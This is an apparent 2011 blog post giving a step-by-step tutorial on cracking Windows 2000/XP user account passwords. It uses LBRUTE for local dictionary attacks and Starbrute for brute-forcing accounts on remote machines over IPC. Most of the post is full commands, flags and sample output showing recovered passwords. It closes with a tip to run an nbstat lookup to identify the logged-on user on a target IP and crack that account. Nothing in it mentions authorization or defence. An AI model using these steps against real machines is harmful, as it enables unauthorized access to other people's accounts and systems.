Saturday 18 June 2011

Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of a account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is.


First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a dictionary attack while logged onto the machine locally.. You will need a wordlist which Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility
Copyright (C) 2005-2006 Pranay Kanwar <>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.
[+] Trying 77012 words from wordlist.txt for 'guest'
[+] Done 21%.
[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account your trying to crack

-f is the name of the wordlist you will be using


Second program we will use is Starbrute

Starbrute can either be used to crack a user account on your own local PC or it can be used to crack a user account on a remote PC. Starbrute uses brute force to guess the password. Meaning it will use Charset:1234567890abcdefghijklmnopqrstuvwxyz in random order to guess the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute guest 3 4 high

════════ Starsky32 IPC bruteforce ════════

▓ Target IP:
▓ User Account:guest
▓ Charset:1234567890abcdefghijklmnopqrstuvwxyz
▓ Start lenght:3
▓ Max lenght:4
▓ Process priority: High

■ Starting...
» Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111. is the IP of the machine your trying to get the account password from.

guest is the account name your trying to crack

3 is start lenght of the password

4 is the maximum lenght of the password

high means the program will use alot of resources - the higher the faster it can guess the password


With both these programs you can specify any account on a machine - administrator, guest or whatever.

Remember you can find out what account is logged onto a machine by typing in this command into CMD: nbstat -a IP

It will show you the username currently logged on and then you can try and crack that account password.